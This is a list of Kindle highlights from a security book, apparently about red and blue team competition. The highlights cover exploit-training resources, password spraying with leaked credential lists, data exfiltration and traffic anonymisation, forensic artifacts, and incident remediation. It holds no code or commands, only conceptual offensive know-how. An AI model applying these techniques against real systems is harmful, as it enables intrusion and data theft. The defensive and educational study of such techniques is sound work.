- One book that serves as a good introduction to the basic techniques of memory corruption is Hacking: The Art of Exploitation[2]. Following that, there are three exploit development courses on https://OpenSecurityTraining.info that I recommend if you want to continue to develop your techniques[3]. Another amazing course comes from RET2[4]; their online wargame-like demo is amazing, although a little pricey[5]. A similar, yet free, version of this course is the RPISEC Modern Binary Exploitation (MBE) course[6] ([Location 4083](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4083))
- Tags: [[pink]]
- I also recommend the Corelan free and paid training[7] if you are looking to get into more advanced techniques here. If you're looking to get into heap exploitation, there is a really great guide by the legendary CTF team, Shellphish, called how2heap[8]. Exploit ([Location 4091](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4091))
- Tags: [[pink]]
- Speaking of generic password lists for cracking, red teams often collect generic passwords from lists like RockYou or these exposed credential dumps: https://github.com/danielmiessler/SecLists/tree/master/Passwords/Leaked-Databases. The collection of the credential sets is important for spraying or enumerating access. Likewise, toolsets to spray the credentials in a usable way are equally important. I like using Hydra[17] because it's so versatile, but there is also go-netscan[18] for the same purposes. ([Location 4140](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4140))
- Tags: [[pink]]
- Repo-diff is a tool that can help detect when a repository has been hijacked with a namespace takeover or has an existing collision (https://github.com/sonatype-nexus-community/repo-diff), something both offensive and defensive teams can leverage. ([Location 4199](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4199))
- Tags: [[pink]]
- The effect of NAT Slipstreaming is that by getting a victim to visit a website, the attacker can then get full network access to the victim's local network. At a high level, this works by abusing the SIP ([Location 4212](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4212))
- Tags: [[pink]]
- One method we can use for generating and disseminating our analysis is F3EAD. F3EAD is a model used in military intelligence targeting that stands for Find, Fix, Finish, Exploit, Analyze, and Disseminate. ([Location 4244](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4244))
- Tags: [[pink]]
- Threat modeling boils down to hypothesizing how you will get attacked and the risks associated with those attacks. Risk is the likelihood of an event multiplied by the impact of the event, which are estimates we can use to guide which threats we will flush out with threat modeling. ([Location 4266](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4266))
- Tags: [[pink]]
- Another amazing example of developing detections based on threat modeling is Andrew Oliveau's BeaconHunter[34]. Andrew knew that the NCCDC red team used Cobalt Strike ([Location 4283](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4283))
- Tags: [[pink]]
- ShimCache became the AmCache with Windows 8 and underwent some major changes. This now keeps a record of every application that has run, its path, creation, and last modified date, along with the SHA1 of the PE[37]. Essentially, whenever a program runs, a service called AeLookupService checks whether that program should be shimmed with the application compatibility features. Then, around 12:30 every day, the task scheduler will flush that cache to a file in %WinDir%\AppCompat\Programs with the timestamp and file path of the file execution. ([Location 4299](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4299))
- Tags: [[pink]]
- The classic example is hiding data in images with steganography, by using techniques such as the least significant byte (LSB) of a color or a pixel to encode hidden data[2]. ([Location 4489](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4489))
- Tags: [[pink]]
- The old open-source tool Snow is designed to encrypt data and encode it into a whitespace cipher to be included at the end of text[4]. Other such tricks include substitution ciphers where the data being exfiltrated is replaced with benign data and decoded later using the same substitution cipher. ([Location 4494](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4494))
- Tags: [[pink]]
- Tailored Access Operations (TAO), part of the NSA that performs offensive operations, would exfiltrate data using a man-on-the-side attack, where they could send data to arbitrary hosts and collect that data along the route where they had a presence on the supporting infrastructure[7]. ([Location 4505](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4505))
- Tags: [[pink]]
- Using a public anonymity network like Tor is a popular option for attackers, but this is also easy to block from a corporate point of view, as they provide a real-time list of all their exit nodes[8]. ([Location 4516](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4516))
- Tags: [[pink]]
- There are still ways to scrape Pastebin; for example, projects such as pystemon can still monitor and scrape Pastebin for regexes[9]. It does this by scraping the archive of recently uploaded pastes and searching their raw entries directly, without the API. It also supports scraping sites such as slexy.org, gist.github.com, paste.org.ru, kpaste.net, ideone.com, pastebin.fr, and pastebin.gr. That said, many attackers have moved on to new paste services such as 0bin.net, snippet.host, and privatebin.info. 0bin.net is an interesting implementation that uses JavaScript in the browser to AES256 encrypt the pastebin content. ([Location 4520](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4520))
- Tags: [[pink]]
- The reason I mention snippet.host is because it also supports a Tor service, so people can connect, read, and post over Tor. ([Location 4535](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4535))
- Tags: [[pink]]
- Using compromised hosts, or even pivoting through a paid botnet, is a very real technique for anonymizing malicious traffic. ([Location 4547](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4547))
- Tags: [[pink]]
- A legal alternative may be to use a VPN or proxy network, which allows attackers to egress out of specific geolocations or even types of service providers. ([Location 4548](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4548))
- Tags: [[pink]]
- Instead of serving ads to their free tier users, they monetize the platform by using the free VPN users as egress locations for the paid users. ([Location 4550](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4550))
- Tags: [[pink]]
- like to use kill dates in competition environments because if the malware leaks, it can't be used by other actors after the competition ends. Gscript is a great dropper platform because you can easily add gscripts with a kill date to any other collection of offensive tools, limiting the entire tool chain's execution with a high priority script that will stop execution past a certain date[11] ([Location 4632](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4632))
- Tags: [[pink]]
- If you think you've caught the initial compromise, it may be safe to respond with just a brief triage or remediating a single host. However, if you think you've caught a large, ubiquitous infection, you will want to scope the full incident before responding to any one host. ([Location 4666](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4666))
- Tags: [[pink]]
- Ultimately, you should follow the evidence and rebuild any hosts or rotate any accounts the attacker has touched. ([Location 4713](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4713))
- Tags: [[pink]]
- Remember, when you are rotating credentials on a Windows domain controller, you will need to reset the passwords twice to change the krbtgt hash[12]. If the krbtgt hash is stolen, it can be used to generate a golden ticket and give attackers persistent access to the domain. A golden ticket allows an attacker to sign Kerberos tickets for any user, granting them any permissions in the domain they wish[13]. This is an extremely important step to take if your domain controller has been compromised. ([Location 4725](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4725))
- Tags: [[pink]]
- From the nightmare scenario of a failed remediation to the big flip technique we covered, quarantining an actor is a delicate balance of speed and planning. ([Location 4766](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4766))
- Tags: [[pink]]